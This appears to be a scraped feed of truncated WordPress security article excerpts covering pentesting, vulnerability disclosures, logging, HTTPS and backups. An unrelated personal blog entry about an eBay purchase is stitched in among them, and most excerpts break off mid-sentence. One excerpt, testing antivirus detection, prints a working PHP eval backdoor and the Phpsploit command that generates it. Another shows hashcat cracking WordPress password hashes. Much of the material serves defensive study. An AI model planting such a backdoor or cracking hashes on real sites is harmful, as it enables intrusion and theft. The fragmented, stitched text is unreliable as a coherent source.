Beyond maintenance, what else could you be doing to secure your WordPress website? Read this blog post to learn more.
Founded in 2012, Maintainn is owned and operated by WebDevStudios. Our mission at Maintainn is simple – to ensure your success! Maintainn takes the burden of maintaining your website off your hands by providing you with safe and reliable WordPress maintenance and support. Partner with us so you never have to worry about your website again.
A beginner's guide to penetration testing, highlighting the common security flaws to look for in WordPress websites, and some of the tools you can use to find these flaws and automate the testing.
WordPress powers a lot of websites on the Internet. So it’s no surprise that seasoned attackers and “script-kiddies” like to target WordPress websites. Whether you’re a webmaster or a security professional, when tasked with assessing the security posture of a WordPress website, it helps to be aware of the common security pitfalls attackers typically take advantage of. It is also important to use the right penetration testing tools. In this article, I’ll be covering a number of common security holes, malpractices and useful information an attacker may be able to abuse in many WordPress installations. I’ll also highlight a number of tools you should use to help you automate the WordPress penetration test.
Heads up — Only perform security penetration testing on systems that belong to you, or that you have been granted permission to test. Understand the limits of the access you have been granted and stay within those limits.
Common WordPress security issues & malpractices
Running old versions of WordPress core containing security vulnerabilities is arguably one of the most common security holes relating to WordPress. While newer versions of WordPress
A team from two universities did extensive testing of popular content management systems such as WordPress and found multiple vulnerabilities related to file uploads.
When it comes to content management systems such as WordPress, hackers will often exploit file upload mechanisms to distribute malicious files which can be used to execute malicious code on a website, infect other websites, and allow hackers to gain full control over the server where your website is hosted. In an effort to prevent the exploitation of file upload forms in content management systems, which are a popular way to build websites, a team of South Korean academics has developed FUSE, a new automated penetration testing tool.
Thanks to FUSE, they have discovered 30 vulnerabilities in various file upload mechanisms in 23 open-source web applications such as WordPress and other popular forum, store builder, and CMS platforms.
What Is FUSE?
FUSE relies on automated penetration testing to discover vulnerabilities in PHP applications that are a direct result of unrestricted file uploads as well as unrestricted executable file uploads, commonly referred to as UFU and UEFU vulnerabilities.
It was developed by a team of academics from the Korea Advanced Institute of Science and Technology (KAIST) and the Electronics and Telecommunications Research Institute (ETRI).
FUSE consists of
Prospects will only buy your products if your e-commerce store is secure, and if they trust it. Here are 10 things you should do to secure your WordPress ecommerce site and keep it secure.
There’s plenty you need to do to ensure your e-commerce store offers the best possible User Experience (UX). This means keeping WordPress and all other software up-to-date, optimizing your store, and of course, ensuring it’s safe to use and secure. By safe to use, we mean doing your best to protect your customers’ data, and making sure nobody besides you or your team has access to your store’s back end. For example, choosing the right web host goes a long way towards offering a secure e-commerce experience. However, that’s just one of many factors.
In this article, we’re going to talk about why it’s so important for your WordPress e-commerce site to be secure. We’ll also walk you through eight ways to protect your ecommerce store. Let’s get right to it!
Why your WordPress e-commerce solution needs to be secure
We often talk about how to keep something secure, but we very rarely explain why it needs to be secure, and what the benefits are.
You’ve probably made a few online purchases yourself. If your payment information is leaked because an e-commerce store you use got hacked, you’re not going to shop there again.
On finding, testing and fixing a long-forgotten race condition vulnerability in WooCommerce.
In continuation of yesterday’s post about bbPress, I decided to look for a more impactful race condition vulnerability. What’s more impactful on an online business than ecommerce? WooCommerce is up for the thread-safety test in this post and probably a couple of others to follow.
What changes with every sale most of the time? Product stock. In WooCommerce it’s decreased when an order is paid. The code responsible for this is currently located in WC_Product_Data_Store_CPT::update_product_stock. The docblock acknowledges that this method contains critical sections of code and that locking is used (spoiler: it’s not).
Uses queries rather than update_post_meta so we can do this in one query (to avoid stock issues). Uses locking to update the quantity. If the lock is not acquired, change is lost.
But looking at the actual body of the method you’re met (in version 4.0.1) with this comment:
// @todo: potential race condition. Read current stock level and lock the row. If the lock can’t be acquired, don’t wait.
Yikes! The lock was never implemented. It’s a tiny bit better than using a get_post_meta and update_post_meta chain, for one reason: doing
A quick summary of the WordPress infosec landscape for January 2020. Swords optional.
WordPress Security and Maintenance Releases: 5.2.4, 5.3.1, and 5.3.2
Pagely customers were spared issues from bugs introduced in the 5.3.0 release as, due to the proximity to the holidays, we didn’t upgrade our customers to 5.3 until early January. All Pagely customers received security patches for vulnerabilities identified in WordPress Core before 5.2.4 for the 5.2 branch and 5.3.1 for the 5.3 branch.
4 vulnerabilities found in WordPress Core:
Privilege Escalation (allowing any user to “sticky” a post)
XSS (Cross Site Scripting) Stored in well-crafted links
XSS in the Block Editor
Improved Security/Sanitization on wp_kses_bad_protocol()
Plugin/Theme Vulnerabilities of Note
InfiniteWP and WP-Time-Capsule
Two separate authentication bypass vulnerabilities were found in InfiniteWP and WP-Time-Capsule; both vulnerabilities were reported by WebARX:
These vulnerabilities pose a critically high risk to any site owners running insecure versions of either plugin. The vulnerability allows malicious parties to bypass authentication and obtain a valid administrator login session by making a single request to a site running either plugin.
Links for more information:
Logs are like unsung heroes; they store a wealth of information and have an important role in any type of software, yet they are often ignored. This article highlights all the different types of logs WordPress administrators have available.
Logs for WordPress administrators – the definitive guide to all the logs WordPress site administrators can use. Logs are like unsung heroes; they store a wealth of information, have an important role in any type of software, yet they are often ignored.
October is a national cyber awareness month, and therefore we have prepared this article together with WP Security Audit Logs, a company known as the “king of logs” in the WordPress ecosystem. Use WebARX20 to get a 20% discount on any WP Security Audit Logs plan here.
This quote from the PCI DSS compliance regulations highlights how important logs are for the security of websites:
Logging mechanisms and the ability to track user activities are critical in preventing, detecting, or minimizing the impact of a data compromise.
In this article, we will explain what logs are, what information you can find in them and how you can use this information to better manage and improve the security of your WordPress websites. Let’s dive right in.
Introduction To Logs
Logs are records of events related to a given software, application, or service. Most modern software products keep logs of some kind. This means everything
File integrity monitoring helps you stay ahead of security breaches and identify errors that could leave your WordPress website exposed to hack attacks.
A default and up-to-date WordPress installation with a strong password is quite secure. However, to survive on the internet that is not enough. That’s where File Integrity Monitoring (FIM) comes into play. A File Integrity Monitoring tool or plugin monitors your site’s files and alerts you to any changes, such as file uploads, edits, removals, and so on.
File integrity monitoring helps you stay ahead of security breaches and identify errors that could leave your website exposed to hack attacks.
In this post, we’ll provide you with a thorough introduction to file integrity monitoring and explain how it can improve your site’s security. We’ll also share a few different tools and plugins you can use to implement this security solution on your WordPress site.
Let’s get started!
An Introduction to File Integrity Monitoring
When it comes to protecting and maintaining infrastructure such as websites and servers, File Integrity Monitoring is key. This solution validates the integrity of a given environment; namely, it checks to see whether the contents of your site’s files have changed unexpectedly.
You can use File Integrity Monitoring to detect file
Prevention is better than cure, even in WordPress security. It is like insurance: you may never need it, but it is always good to have.
A common misconception is that malicious hackers only target websites with large income, or those that store valuable sensitive information. However, WordPress websites generally get a lot of unwanted attention, which is why it’s important to take preventive measures from the get-go. The good news is that (on top of basic measures such as having a robust updating strategy) WordPress offers you a lot of options to protect your website against hack attacks. Even simple implementations, such as enabling Two-Factor Authentication (2FA) can drastically improve the security of your website or eCommerce store.
In this article, we’ll talk about why preemptive WordPress security is the way to go. We will also highlight five preventive WordPress security measures, so you won’t have to deal with messy cleanups afterward. Let’s get to work!
Why prevention is essential in WordPress security
Spending time on preemptive security is a lot like getting travel insurance before heading to a safe and well-known country. It’s a step that’s usually forgotten about by many travelers – until your hotel room is ransacked. From then on, travel insurance is always a top
User trust once violated is very hard to regain. Be mindful to protect the trust you have earned.
Our writeup about a new XSS vulnerability in the Envira Photo Gallery WordPress plugin. Affecting about 100,000 WordPress installations
A high-severity Cross-Site Scripting (XSS) vulnerability, tracked as CVE-2020-9334, exists in a popular WordPress plugin called Envira Photo Gallery, rendering over 100,000 websites vulnerable to phishing attacks, theft of administrators’ session tokens, etc. In this blog post, we will cover what caused the flaw, an example Proof-Of-Concept showing exploitation in a sandbox environment, and mitigation steps.
What is the Envira Photo Gallery Plugin?
According to the official documentation of the plugin,
We believe that you shouldn’t have to hire a developer to create a WordPress gallery. That’s why we built Envira, a drag & drop photo gallery plugin that’s both EASY, FAST and POWERFUL.
What is the vulnerability and how does it work?
I will explain this in 4 simple steps:
The plugin provides an authenticated user a drag & drop photo gallery feature in the control panel,
If a malicious user were to
Keeping a record of everything that happens on your #WordPress #website is just the beginning. You also need to backup your logs, control who accesses them, and ensure the setup is secure. To help you get started we've prepared a list of best practices for managing WordPress activity logs.
The data stored in the WordPress activity log is sensitive and confidential. So should you back it up? Should you archive it and keep it secure? Many compliance regulations stipulate who can access such data, and how such data should be stored, secured and backed up. This is common practice in the finance and healthcare industries. Typically they also stipulate for how long activity log data should be kept.
Therefore installing WP Security Audit Log to keep a log of user and site changes is just the beginning. As a business you are also responsible for the security and management of the WordPress activity logs (aka audit log or audit trail) on your website(s).
In this article we explain all you need to know about managing and maintaining the WordPress activity log data. We also explain how you can use the tools in WP Security Audit Log to manage and keep your WordPress activity logs secure and backed up.
Accessing old data
For how long should you keep the WordPress activity log data?
There are many factors to consider when deciding for how long you should retain your website’s activity log data:
Does your business have to comply with specific regulatory compliance requirements?
I'm testing one of the tools used to create and control a PHP backdoor. In this test I'm backdooring one of the WordPress included files.
As many of you know, WordPress is written in PHP. Finding backdoors in PHP and WordPress code can be quite tricky and sometimes almost impossible, since backdoors could be hidden anywhere in the code and look like regular code with human coding errors, and a regular installation of WordPress consists of about 432,709 lines of PHP code. So instead of reading all the code and looking for backdoors, we could use automated tools like antivirus software; a popular open source antivirus software is ClamAV.
Today we are going to test the offensive Command and Control (C2) software Phpsploit, described as below from their Github page:
PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
The above code can be generated by running the following command:
./phpsploit --interactive --eval "backdoor"
Just as with insurance, many administrators only realize how important activity logs are when $h*t happens! However, in such cases it is too late: if you do not have a WordPress activity log plugin installed, you cannot find out what happened on your website.
When users uninstall the WP Security Audit Log plugin from their WordPress website, we ask them why they would like to uninstall the plugin. The most common answer is “we no longer need it”. In other words, the website administrator no longer needs to keep a log of changes that happen on the website. To me and everyone in security, this raises some red flags. It is ineffective to keep a log of changes on any system when used retroactively, after an error or breach occurs. WP Security Audit Log is a powerful WordPress administrator plugin, but only if used properly.
In this post we share four key reasons that highlight how important it is to always keep a log of user and site changes, not just when you think you need to.
4 key reasons to always keep a record of site and user changes in a WordPress activity log
1. Activity logs (and monitoring) are a WordPress security staple
There are several ways to secure and protect your WordPress site. For example, you can add two-factor authentication, and set up a WordPress firewall and strong password policies. However, security is not a one-time fix, but a process.
That is why WordPress activity logs are also an important component of a WordPress
Here we go again. There's a company out there making security flaws public, without talking to the plugin authors.
A US-based cyber-security firm has published details about two zero-days that impact two of Facebook's official WordPress plugins. The details also include proof-of-concept (PoC) code that allows hackers to craft exploits and launch attacks against sites using the two plugins.
The two zero-days impact "Messenger Customer Chat," a WordPress plugin that shows a custom Messenger chat window on WordPress sites, and "Facebook for WooCommerce," a WordPress plugin that allows WordPress site owners to upload their WooCommerce-based stores on their Facebook pages.
The first plugin is installed on over 20,000 sites, while the second has a userbase of 200,000, with its statistics exploding since mid-April when the WordPress team decided to start shipping the Facebook for WooCommerce plugin as part of the official WooCommerce online store plugin itself.
Since then, the plugin has garnered a collective rating of 1.5 stars, with the vast majority of reviewers complaining about errors and a lack of updates.
Nevertheless, despite the bad reputation, today, the security of all users who installed these extensions was put at risk because of a stupid grudge
WordPress HTTPS, SSL and TLS for #WordPress administrators - in this article you will find everything you need to know about these protocols and how to configure HTTPS on your #website.
When you visit a website, your browser (also known as a client) sends an HTTP request to a web server. Once the web server sends an HTTP response, the browser can then render the page to your screen. However, HTTP traffic has a problem: it is a plaintext protocol. This makes it susceptible to snooping and meddling. If an attacker is on the same network as you, they can intercept and read your HTTP traffic. They may also modify both your requests to the server and the server’s responses back to you. This is known as a Man-in-the-Middle (MitM) attack. This can easily happen on public Wi-Fi networks, such as the ones in hotel lobbies and public spaces.
That is why a website should be on HTTPS – so traffic cannot be intercepted. This article explains what HTTPS, SSL and TLS are. It also explains how you can configure your WordPress website to work on HTTPS.
What is SSL/TLS?
Once the internet started to grow in use, it became obvious that we needed a mechanism to securely transfer information between a client and server without anyone being able to eavesdrop or modify traffic — enter SSL, or Secure Socket Layer. SSL is an Internet security protocol, first developed
Pipdig Power Pack versions up to 4.7.3 contain the backdoor code, which has been removed as of version 4.8.0
Karl is off work this week (due to working in a school, lots of holidays, lucky bastard, bla bla bla). I asked him this morning to try and purchase the replacement keyboard for my laptop, as linked from my “OMG DISASTER” entry update, now that we’ve transferred money to the “Internet account”. He spent all afternoon trying to get them to accept the payment details/address etc with no luck. I returned from work (due to not working in a school and having crap normal holidays, bla bla bla) and we decided to resort to e-Gay e-Bay. I, of course, am terribly negatively biased against them since they allowed some tit up the road to sell stolen cameras using Karl’s mum’s address, causing the coppers to come and take away my laptop. Long story short, we registered there anyway and proceeded to “Click to Buy” a replacement VAIO keyboard/case that we found: £30.00 for the item, £8.00 post and packaging.
We went through, entered the details into PayPal, reviewed everything and clicked “Pay”. We received an error telling us that the seller did not accept payment through this method (despite the preferred method being paypal?)
Hashcat is a free tool to crack passwords (hashes) using GPU power
When it comes to complex password cracking, hashcat is the tool that comes into play, as it is the well-known password cracking tool freely available on the internet. The passwords can be in the form of hashes such as SHA, MD5, WHIRLPOOL, etc. Unlike encryption, hashes do not allow a user to recover the data with a specific key. Hashcat uses techniques like rainbow tables, dictionary attacks, or brute force. This article gives an example of how hashcat can be used to crack complex WordPress passwords. Hashcat is a built-in tool in Kali Linux which can be used for this purpose.
To see what hashcat offers, run hashcat --help as shown below:
An example of the output is given below:
- [ Outfile Formats ] -
# | Format
1 | hash[:salt]
2 | plain
3 | hash[:salt]:plain
4 | hex_plain
5 | hash[:salt]:hex_plain
6 | plain:hex_plain
7 | hash[:salt]:plain:hex_plain
8 | crackpos
9 | hash[:salt]:crack_pos
10 | plain:crack_pos
11 | hash[:salt]:plain:crack_pos
12 | hex_plain:crack_pos
13 | hash[:salt]:hex_plain:crack_pos
An update to our vulnerability disclosure policy. 30 days - no exception.
This post is about the realities both good and bad that come with the responsibility of reporting vulnerabilities. The long days of summer are gone, fall has faded away and winter is upon us… reflecting back over the past months the Pagely security team spent some of those days uncovering and reporting a number of unreleased exploits (or 0days) being used against our customers’ sites. It’s just part of the job. When securing sites we see what vulnerabilities attackers are using and how they work, and as an extension of that task, we make sure plugin authors are notified about the vulnerability so they can apply a patch.
It’s a fantastic feeling when we see an actively targeted vulnerable plugin getting patched and secured, but that feeling only comes after the patch gets applied. Just like the feeling of the first fall colors coming in, summer must yield to fall, to allow the shorter, cooler days to prevail. If we had 365 days of summer, then the world would be a barren wasteland. Much like the seasons, vulnerability reports need to be handled swiftly, before the users of the software get burned by attackers.
The time spent waiting for the patch can be stressful,
Learn how we implement SSO using WordPress and Google accounts.
Single Sign-On (SSO) is one of those features every pointy-haired boss in the world wants on their websites. Managing user accounts and passwords across dozens of work-related sites gets very old, very quickly. As time went on, the need for an SSO solution at WebDevStudios (WDS) grew. I’ll tell you a little about our implementation of Single Sign-On using WordPress and Google accounts, and how it helps both WDS and our clients simultaneously.
What is it?
In the simplest terms, Single Sign-On is a way for someone to access multiple websites using one set of username and password credentials.
The WDS-specific implementation uses Google authentication, primarily because we use the Google apps suite for our work tools. But WDS-SSO can easily support any standard OAuth service. Here’s a list of features we built into our SSO solution:
Google Auth support (including Two-Factor Authentication)
Client/Proxy configuration makes setup a one-time task
Enforces all sites involved to use HTTPS
Selective role maps (including Super Admin) for individuals and/or sites
Support for selective (multiple)
Consultant Joe Youngblood talks about a default setting in Yoast that makes it easier for hackers to harvest usernames, which means hackers have one half of the combination for automated brute force attacks.
TL;DR WordPress creates Author Archives pages for anyone who publishes content on a website sometimes keeping that page live even if that content is transferred to another user.
By default, WordPress uses the ‘username’ a user logs in with for the Author Archive page URL and offers no way of changing this.
When Yoast is installed, sitemaps are activated by default, creating an Author Archive sitemap which contains all the Author URLs complete with usernames.
Hackers can use this file to harvest valid usernames for a website, making hacking easier by only needing to guess passwords.
This attack vector can be patched by turning off Author Archives in Yoast or if Author Archives are required by editing the URL of author archives in the WordPress code.
Update: Yoast was notified of my concerns earlier this week, has fully reviewed them, and responded. Essentially in their response they stated this wasn’t much of a concern to them though they had discussed it and offered tips. I’ve placed their entire response at the bottom of this article, you can get there by clicking here.
Yoast is a wildly popular WordPress plugin that helps websites become more SEO friendly.
Website maintenance and security are vital. You put time, effort and money into your business so why not make sure everything is always up and running the way it should be?
Website maintenance and security are a crucial element of your business. You put a lot of time and money into your online image as it represents your business, so why not ensure it stays up, runs smoothly, and never has downtime? Even if your website is only used to provide informational content about your products or services, your website can be compromised if you don’t perform website maintenance and management on a regular basis. The last thing you want to deal with is hackers. They can bring down your website and create a problem for your business and your customers. So, what can you do? We’ll tackle each important task one at a time, but here is what you’ll learn:
The Main Website Maintenance and Security Master List
It’s actually pretty simple. Let’s take a look at 16 tips to maintain your website’s security so you won’t fall victim to hackers or other online threats. When you follow this master list, you’ll see that your website stays in tip top shape at all times. And, that’s what you want for the face of your business!
1. How Often Should You Back Up Your Website
I’m sure the idea of backups is nothing new to you. Backups
This is a story of how I nearly lost 15 years of photos because I systematically deleted everywhere the backup was - starting with Flickr.com. Luckily, I had enough copies, due to a good backup strategy, that they were saved. Here's how.
Over the weekend I had a bit of a scare. I was thinking about my trip to Ireland – a trip I took nearly 15 years ago – and I decided to take a walk down memory lane. Since those photos were on Flickr and I decided to delete Flickr earlier this year, I went to the Photos app, assuming I added them. No dice. OK – I’ll check my Time Machine backup. Not there either. Luckily, they were somewhere. But not before I started to panic.
What Happened to my Photos?
Well, the short of it is I downloaded my Flickr photos on my PC, the day before my iMac Pro came. No problem – I had a backup, right?
My Backup System
On my PC, I had a 3-pronged approach to backups:
Getting Rid of the PC
So as I said, my iMac Pro came the day after I backed up my Flickr account. So the Flickr account is gone, and at this point, the archive exists on the PC, and Backblaze. Then this series of events happened:
I waited a couple of weeks to wipe the PC to make sure I didn’t need anything. I wiped it when I sold it. That would be the main drive, and the built-in SSD drive.
I kept the Backblaze account until it was time for me to renew my billing – that was about 7 months after
WordPress security is super important. But, as times change, knowing which classic WordPress security advice to follow and not to follow isn't easy. David Hayes of WPShout fame shares advice on what not to worry about.
Following last week’s post about WordPress security, in this post I’ll start with advice I see commonly in other places that I don’t see much point in doing. Most of this advice is nearly harmless to slightly beneficial if it’s done. But the reason I don’t recommend it is that its benefits (where they exist) are so small, and the possibility that spending time on them makes you ignore more valuable security practices is big. You’re free to do these, but I just don’t think they’re worth the time invested because the gains they give are very small.
Don’t Bother: Hide WordPress Version
We’re starting with the most useless piece of common security advice—that you should hide your WordPress version number, or that you’re using WordPress. The second is very hard to do in a serious way, and the first is basically valueless.
Hiding that you’re running WordPress is hard, and most people are trying to do it merely by changing or eliminating a <meta> tag in their site. No reasonably intelligent botnet builder is going to be relying on that, and many webmasters of non-WordPress sites report that they see people